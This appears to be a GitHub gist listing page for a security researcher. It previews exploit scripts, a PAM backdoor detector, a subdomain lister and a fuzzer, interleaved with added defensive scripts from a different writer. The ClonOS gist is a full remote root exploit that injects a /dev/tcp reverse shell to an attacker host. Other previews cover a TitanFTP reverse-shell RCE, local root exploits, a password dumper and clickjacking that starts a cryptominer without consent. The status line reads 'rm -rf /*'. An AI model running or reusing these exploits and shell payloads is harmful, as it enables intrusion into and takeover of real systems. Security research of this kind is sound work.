💭
`rm -rf /*`

bcoles

bcoles / linux-pam-backdoor-detect.sh
Created September 13, 2020 13:40
Detect PAM backdoors created by linux-pam-backdoor
#!/bin/bash
# Detect PAM backdoors created by linux-pam-backdoor:
# https://github.com/zephrax/linux-pam-backdoor
#
# Note: this will likely only work with PAM version 1.3.0.
# ---
# $ ./backdoor.sh -v 1.3.0 -p some_s3cr3t_p455word
# Automatic PAM Backdoor
# PAM Version: 1.3.0
# Password: some_s3cr3t_p455word
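The gist above is tied to PAM 1.3.0, presumably because it looks for artefacts of that particular build. A version-independent complement, added here as an example (this is not bcoles's script and does not describe how his gist works), is to treat pam_unix.so like any other binary on the host: compare it with a SHA-256 recorded from a trusted build, and ask the package manager to verify the file against its own manifest. A rebuilt, backdoored module keeps its name but cannot keep its hash. The module paths, the known-good list format and the PAM_CHECK_SCAN/KNOWN variables are illustrative assumptions.

```bash
#!/bin/bash
# Added example: integrity check for PAM modules. Not part of bcoles's gist and
# not a description of how that gist works. Paths, the known-good hash list and
# the PAM_CHECK_SCAN / KNOWN variables are illustrative assumptions.

# Print the SHA-256 of a file (coreutils sha256sum or BSD shasum).
pam_sha256() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# pam_check_module <module_path> <known_good_file>
# <known_good_file> holds "<sha256>  <path>" lines in sha256sum format, recorded
# from a trusted build. Returns 0 on match, 1 on mismatch, missing file or
# missing record. A backdoored pam_unix.so is a rebuilt binary, so its hash
# changes while its name does not.
pam_check_module() {
  local module="$1" known="$2" actual expected
  if [ ! -f "$module" ]; then
    echo "[!] $module: not found"
    return 1
  fi
  actual=$(pam_sha256 "$module")
  expected=$(awk -v p="$module" '$2 == p { print $1; exit }' "$known")
  if [ -z "$expected" ]; then
    echo "[!] $module: no known-good hash recorded"
    return 1
  fi
  if [ "$actual" != "$expected" ]; then
    echo "[!] $module: SHA-256 mismatch (possible backdoor or unrecorded update)"
    return 1
  fi
  echo "[+] $module: SHA-256 matches"
  return 0
}

# pam_check_package <module_path>
# Cross-check with the package manager's own file manifest. Returns 0 if the
# file verifies, 1 if it is unowned or reported as modified, 2 if neither dpkg
# nor rpm is available (unverified, which is not the same as clean).
pam_check_package() {
  local pkg
  if command -v dpkg >/dev/null 2>&1; then
    pkg=$(dpkg -S "$1" 2>/dev/null | cut -d: -f1)
    [ -n "$pkg" ] || return 1
    # dpkg -V prints one line per file that fails verification
    if dpkg -V "$pkg" 2>/dev/null | grep -qF -- "$1"; then
      return 1
    fi
    return 0
  elif command -v rpm >/dev/null 2>&1; then
    rpm -qf "$1" >/dev/null 2>&1 || return 1
    # rpm -Vf prints one line per file that fails verification
    if rpm -Vf "$1" 2>/dev/null | grep -qF -- "$1"; then
      return 1
    fi
    return 0
  fi
  return 2
}

# Scan every pam_unix.so on the host when invoked with PAM_CHECK_SCAN=1:
#   PAM_CHECK_SCAN=1 KNOWN=/root/pam.sha256 ./pam-check.sh
if [ "${PAM_CHECK_SCAN:-0}" = 1 ]; then
  find /lib /usr/lib -name 'pam_unix.so' 2>/dev/null | while read -r m; do
    pam_check_module "$m" "${KNOWN:-/root/pam.sha256}"
    pam_check_package "$m"
    case $? in
      0) echo "[+] $m: package manager verification passed" ;;
      1) echo "[!] $m: unowned or reported as modified by the package manager" ;;
      2) echo "[?] $m: no package manager available to cross-check" ;;
    esac
  done
fi
```

Record the known-good list from a freshly installed host or from the package itself, not from the machine under investigation; a hash taken after compromise only proves the backdoor is still there. The package-manager check is weaker than it looks, since root can edit the manifest too, which is why both checks are reported separately.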
bcoles / titanftp-server-admin-event-handler-rce
Last active March 22, 2020 04:19
titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#!/bin/bash
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Requires remote administration interface to be enabled. (Default port 31001/tcp).
# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
# ---
# $ ./titanftp-server-admin-event-handler-rce
# TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Generating PowerShell reverse shell to 172.16.191.165:1337 ...
bcoles / clonos-root-rce.sh
Last active November 4, 2019 13:30
Trivial ClonOs remote root RCE exploit for CVE-2019-18418
#!/bin/bash
# clonos-root-rce
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
# Note: Start netcat listener on LHOST:LPORT first
# The backticked payload in form_data[jname] is executed by the server; %26 is a
# URL-encoded '&' so the fd redirections survive the POST body.
RHOST="172.16.191.240"
LHOST="172.16.191.165"
LPORT=1337
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"
bcoles / jellyfin-brute.rb
Created August 21, 2019 16:02
Jellyfin Password Reset PIN Brute Force
#!/usr/bin/env ruby
################################################################################
# Jellyfin Password Reset PIN Brute Force                                      #
#                                                                              #
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2.   #
# This will likely also work on Emby Media Server, but untested.               #
#                                                                              #
# Note: cURL must be installed and in $PATH                                    #
#                                                                              #
# Note: Upon successful exploitation, the password will be reset for all users,#
bcoles / lightdmpwn.sh
Created September 19, 2018 08:36
Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
#!/bin/bash
# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
# ---
# Usage: ./lightpwn
# A LightDM session is required. Exploitation will lock the current session,
# and could take several minutes. It usually takes about a minute.
# When the screen stops flashing, unlock the session and run: /bin/subash
# ---
# There's nothing new or special about this exploit.
# It's simply a slightly more weaponised version of the original PoC,
bcoles / lastore-daemon-root.sh
Created March 24, 2018 22:39
Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#!/bin/bash
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
#
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/
bcoles / lightdmdump
Created March 11, 2018 05:57
Dump clear text passwords from lightdm sessions on Ubuntu
#!/bin/bash
# lightdmdump
# ---
# Dump clear text passwords from lightdm sessions on Ubuntu
# Requires root privileges to dump lightdm process memory
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS
# ---
# Bug discovered by: Sven Blumenstein
# Disclosure date: 2017-09-15
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490
bcoles / crt.sh
Created March 8, 2018 11:07
List sub-domains using crt.sh
#!/bin/bash
# List sub-domains using crt.sh
set -euo pipefail
IFS=$'\n\t'
error() {
echo "[ERROR] $*"
exit 1
}
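Only the preamble of crt.sh survives above. The part worth showing is the parsing, so here is an added example (not bcoles's script) that turns crt.sh's JSON output into a unique hostname list. crt.sh returns an array of certificate entries whose name_value field is a newline-separated list of subject names, which may be wildcarded or mixed case; the function collapses wildcards to their base domain, lowercases, and deduplicates. The CRTSH_SAMPLE JSON is constructed for illustration and the CRTSH_DOMAIN switch is an assumption.

```bash
#!/bin/bash
# Added example (not the gist above): parse crt.sh's JSON output into a unique
# hostname list. The sample JSON below is constructed; CRTSH_DOMAIN is an
# illustrative switch, not a crt.sh parameter.

# crtsh_hostnames: stdin = crt.sh JSON (output=json), stdout = sorted unique
# hostnames. Wildcard entries are reduced to their base domain: "*.example.com"
# is not a host to probe, but it tells you example.com issues certificates for
# arbitrary subdomains. Entries that are not plain hostnames (e-mail addresses,
# names with spaces) are dropped.
crtsh_hostnames() {
  grep -o '"name_value":"[^"]*"' \
    | sed -e 's/^"name_value":"//' -e 's/"$//' \
    | awk '{ gsub(/\\n/, "\n"); print }' \
    | sed -e 's/^\*\.//' \
    | tr 'A-Z' 'a-z' \
    | grep -E '^[a-z0-9.-]+$' \
    | sort -u
}

# crtsh_query <domain>: fetch every certificate crt.sh has logged for the
# domain and its subdomains (%25 is a URL-encoded '%', the SQL wildcard).
crtsh_query() {
  curl -sf "https://crt.sh/?q=%25.$1&output=json"
}

# Constructed sample of what crt.sh returns, with the fields trimmed down.
CRTSH_SAMPLE='[{"issuer_ca_id":1,"common_name":"www.example.com","name_value":"www.example.com\nexample.com"},{"issuer_ca_id":2,"common_name":"*.example.com","name_value":"*.example.com\nMail.example.com"}]'

# Offline demonstration on the sample:
#   printf '%s' "$CRTSH_SAMPLE" | crtsh_hostnames
# Live usage:
#   CRTSH_DOMAIN=example.com ./crt-parse.sh
if [ -n "${CRTSH_DOMAIN:-}" ]; then
  crtsh_query "$CRTSH_DOMAIN" | crtsh_hostnames
fi
```

The grep/sed extraction works because crt.sh emits flat objects with no nested quotes in name_value; if you need to cope with arbitrary JSON, swap the first two stages for `jq -r '.[].name_value'` and keep the rest of the pipeline.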
bcoles / fuzz.rb
Created November 18, 2017 05:16
Fuzz Origami Ruby gem with mutated PDF files
#!/usr/bin/env ruby
###################################################
# ----------------------------------------------- #
# Fuzz Origami Ruby gem with mutated PDF files    #
# ----------------------------------------------- #
#                                                 #
# Each test case is written to 'fuzz.pdf' in the  #
# current working directory.                      #
#                                                 #
# Crashes and the associated backtrace are saved  #
bcoles / clickjack-authedmine.html
Created October 21, 2017 19:32
Start the AuthedMine JavaScript Monero miner without user consent (using clickjacking)
<html>
<body>
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
</div>
</body>
<script>
window.onmousemove = function(e) {
var container = document.getElementById("container");
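The trick above works only because the framed miner page can be loaded inside an invisible iframe on an attacker's site. The fix is server side and belongs to the framed page: an X-Frame-Options header of DENY or SAMEORIGIN, or a Content-Security-Policy frame-ancestors directive that does not allow arbitrary origins. As an added example (not part of bcoles's gist), the following function takes raw response headers, such as those printed by `curl -sI`, and reports whether third-party framing is blocked; the header samples in the usage comment are constructed.

```bash
#!/bin/bash
# Added example, not part of the gist above: check whether an HTTP response
# forbids third-party framing, the server-side countermeasure to the
# clickjacking technique in clickjack-authedmine.html. Header samples in the
# comments are constructed.

# frame_protected: stdin = raw HTTP response headers (e.g. from `curl -sI URL`).
# Returns 0 if framing by other origins is blocked by X-Frame-Options
# (DENY or SAMEORIGIN) or by a CSP frame-ancestors directive that is not a
# bare "*", 1 otherwise. Header names are matched case-insensitively and CRLF
# line endings are tolerated. Content-Security-Policy-Report-Only is ignored
# on purpose: it reports violations but does not block the frame.
frame_protected() {
  local hdrs xfo fa
  hdrs=$(tr -d '\r' | tr 'A-Z' 'a-z')

  # X-Frame-Options: only DENY and SAMEORIGIN block third parties;
  # the obsolete ALLOW-FROM is not honoured by current browsers.
  xfo=$(printf '%s\n' "$hdrs" \
    | sed -n 's/^x-frame-options:[[:space:]]*\([a-z]*\).*/\1/p' | head -n 1)
  case "$xfo" in
    deny|sameorigin) return 0 ;;
  esac

  # CSP: take the frame-ancestors source list, up to the next ';'.
  fa=$(printf '%s\n' "$hdrs" \
    | sed -n 's/^content-security-policy:.*frame-ancestors[[:space:]]*\([^;]*\).*/\1/p' \
    | head -n 1)
  if [ -n "$fa" ]; then
    # A bare "*" permits any origin; "https://*.example.com" does not.
    case " $fa " in
      *" * "*) return 1 ;;
    esac
    return 0
  fi
  return 1
}

# Usage against a live site:
#   curl -sI "https://example.com/" | frame_protected && echo protected
# Constructed samples:
#   printf 'HTTP/1.1 200 OK\r\nX-Frame-Options: DENY\r\n\r\n' | frame_protected  -> 0
#   printf 'HTTP/1.1 200 OK\nContent-Security-Policy: frame-ancestors *\n' | frame_protected  -> 1
```

Run it against the page you actually embed, not just the site root: CSP and X-Frame-Options are per response, and a miner or payment page served from a different path or subdomain can be unprotected while the homepage is not.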